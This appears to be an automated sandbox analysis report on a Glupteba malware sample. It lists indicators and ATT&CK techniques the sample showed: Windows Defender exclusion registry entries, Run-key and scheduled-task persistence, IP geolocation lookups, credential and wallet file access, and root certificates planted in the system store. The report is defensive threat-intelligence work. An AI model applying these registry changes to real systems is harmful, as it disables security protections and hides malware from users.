glupteba | 607a3b4871b8c1789e4694dcfd04255b4666d266efb3a4572de13de15ebec5d7

Processes:

Graphics.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\TwilightFrog = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Graphics.exe = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	Graphics.exe

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

Graphics.exeFiles.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\TwilightFrog = "\"C:\\Windows\\rss\\csrss.exe\""	Graphics.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

165 ipinfo.io
11 ip-api.com
47 ipinfo.io
48 ipinfo.io
164 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Drops file in System32 directory 1 IoCs

Processes:

Install.exe

description ioc process

File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe

flow	ioc
165	ipinfo.io
11	ip-api.com
47	ipinfo.io
48	ipinfo.io
164	ipinfo.io

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

Drops file in Program Files directory 2 IoCs

Processes:

9tJIwLeuaxdk_JoJtJ4IawCE.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	9tJIwLeuaxdk_JoJtJ4IawCE.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	9tJIwLeuaxdk_JoJtJ4IawCE.exe

Drops file in Windows directory 3 IoCs

Processes:

Graphics.exemakecab.exe

description	ioc	process
File created	C:\Windows\rss\csrss.exe	Graphics.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20220310150849.cab	makecab.exe
File opened for modification	C:\Windows\rss	Graphics.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

WEQebRcSNauy6Cpuw2THycbD.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	WEQebRcSNauy6Cpuw2THycbD.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WEQebRcSNauy6Cpuw2THycbD.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2568 schtasks.exe
2764 schtasks.exe
2916 schtasks.exe
2908 schtasks.exe
1184 schtasks.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

2620 tasklist.exe
2492 tasklist.exe

pid	process
2568	schtasks.exe
2764	schtasks.exe
2916	schtasks.exe
2908	schtasks.exe
1184	schtasks.exe

pid	process
2620	tasklist.exe
2492	tasklist.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1044 taskkill.exe
476 taskkill.exe

pid	process
1044	taskkill.exe
476	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Graphics.exenetsh.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-471 = "Ekaterinburg Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	Graphics.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	Graphics.exe

Modifies system certificate store 2 TTPs 11 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

WEQebRcSNauy6Cpuw2THycbD.exebfgCQBkJldfvK7hOSpVN1_S0.exeFile.execsrss.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob = 0f00000001000000140000001e427a3639cce4c27e94b1777964ca289a722cad09000000010000003e000000303c06082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030806082b060105050703091400000001000000140000006daa9b0987c4d0d422ed4007374d19f191ffded31d000000010000001000000096f98b6e79a74810ce7d398a82f977780b000000010000000e000000430065007200740075006d0000000300000001000000140000006252dc40f71143a22fde9ef7348e064251b181182000000001000000100300003082030c308201f4a0030201020203010020300d06092a864886f70d0101050500303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d204341301e170d3032303631313130343633395a170d3237303631313130343633395a303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ceb1c12ed34f7ccd25ce183e4fc48c6f806a73c85b51f89bd2dcbb005cb1a0fc7503ee81f088ee2352e9e615338dac2d09c576f92b398089e4974b90a5a878f873437ba461b0d858cce16c667e9cf3095e556384d5a8eff3b12e3068b3c43cd8ac6e8d995a904e34dc369a8f818850b76d964209f3d795830d414bb06a6bf8fc0f7e629f67c4ed265f10260f084ff0a45728ce8fb8ed45f66eee255daa6e39bee4932fd947a072ebfaa65bafca533fe20ec69656116ef7e966a926d87f9553ed0a8588ba4f29a5428c5eb6fc852000aa680ba11a85019cc446638288b622b1eefeaa46597ecf352cd5b6da5df748331454b6ebd96fcecd88d6ab1bda963b1d590203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010505000382010100b88dceefe714bacfeeb044926cb4393ea2846eadb82177d2d4778287e6204181eee2f811b763d11737be1976241c041a4ceb3daa676f2dd4cdfe653170c51ba6020aba607b6d58c29a49fe63320b6be33ac0acab3bb0e8d309518c1083c634e0c52be01ab66014276c32778cbcb27298cfcdcc3fb9c8244214d657fce62643a91de58090ce0354283ef73fd3f84ded6a0a3a93139b3b142313639c3fd1872779e54c51e301ad855d1a3bb1d57310a4d3f2bc6e64f55a5690a8c70e4c740f2e713bf7c847f4696f15f2115e831e9c7c52aefd02da12a8596718dbbc70dd9bb169ed80ce8940486a0e35ca29661521942ce8602a9b854a40f36b8a24ec06162c73	WEQebRcSNauy6Cpuw2THycbD.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	bfgCQBkJldfvK7hOSpVN1_S0.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	File.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118	WEQebRcSNauy6Cpuw2THycbD.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob = 1900000001000000100000000b6cd9778e41ad67fd6be0a6903710440300000001000000140000006252dc40f71143a22fde9ef7348e064251b181180b000000010000000e000000430065007200740075006d0000001d000000010000001000000096f98b6e79a74810ce7d398a82f977781400000001000000140000006daa9b0987c4d0d422ed4007374d19f191ffded309000000010000003e000000303c06082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030806082b060105050703090f00000001000000140000001e427a3639cce4c27e94b1777964ca289a722cad2000000001000000100300003082030c308201f4a0030201020203010020300d06092a864886f70d0101050500303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d204341301e170d3032303631313130343633395a170d3237303631313130343633395a303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ceb1c12ed34f7ccd25ce183e4fc48c6f806a73c85b51f89bd2dcbb005cb1a0fc7503ee81f088ee2352e9e615338dac2d09c576f92b398089e4974b90a5a878f873437ba461b0d858cce16c667e9cf3095e556384d5a8eff3b12e3068b3c43cd8ac6e8d995a904e34dc369a8f818850b76d964209f3d795830d414bb06a6bf8fc0f7e629f67c4ed265f10260f084ff0a45728ce8fb8ed45f66eee255daa6e39bee4932fd947a072ebfaa65bafca533fe20ec69656116ef7e966a926d87f9553ed0a8588ba4f29a5428c5eb6fc852000aa680ba11a85019cc446638288b622b1eefeaa46597ecf352cd5b6da5df748331454b6ebd96fcecd88d6ab1bda963b1d590203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010505000382010100b88dceefe714bacfeeb044926cb4393ea2846eadb82177d2d4778287e6204181eee2f811b763d11737be1976241c041a4ceb3daa676f2dd4cdfe653170c51ba6020aba607b6d58c29a49fe63320b6be33ac0acab3bb0e8d309518c1083c634e0c52be01ab66014276c32778cbcb27298cfcdcc3fb9c8244214d657fce62643a91de58090ce0354283ef73fd3f84ded6a0a3a93139b3b142313639c3fd1872779e54c51e301ad855d1a3bb1d57310a4d3f2bc6e64f55a5690a8c70e4c740f2e713bf7c847f4696f15f2115e831e9c7c52aefd02da12a8596718dbbc70dd9bb169ed80ce8940486a0e35ca29661521942ce8602a9b854a40f36b8a24ec06162c73	WEQebRcSNauy6Cpuw2THycbD.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a